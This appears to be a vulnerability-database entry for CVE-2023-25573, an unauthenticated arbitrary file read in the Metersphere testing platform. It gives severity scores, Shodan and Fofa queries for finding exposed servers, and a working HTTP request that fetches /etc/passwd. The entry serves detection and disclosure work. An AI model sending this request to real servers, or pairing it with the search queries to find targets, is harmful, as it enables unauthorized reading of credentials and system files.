🔙 목록으로 돌아가기

CVE-2023-25573: Metersphere - Arbitrary File Read

TitleMetersphere - Arbitrary File Read
AuthorDhiyaneshDK
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access to sensitive information, such as configuration files, credentials, and other sensitive data.
RemediationUsers are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS Score7.5
EPSS Score0.93455
CVE IDCVE-2023-25573
CWE IDCWE-862
Shodan Queryhttp.html:"metersphere"
Fofa Querybody="Metersphere"body="metersphere"title="metersphere"
Tags cve cve2023 metersphere lfi vkev vuln

🔍 Vulnerability Description

Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in /api/jmeter/download/files, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1

🌐 HTTP Request

POST /api/jmeter/download/files HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.1
Connection: close
Content-Length: 67
Content-Type: application/json
Accept-Encoding: gzip

{"reportId":"yyEo","bodyFiles":[{"id":"FCV","name":"/etc/passwd"}]}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-25573.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-25573.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A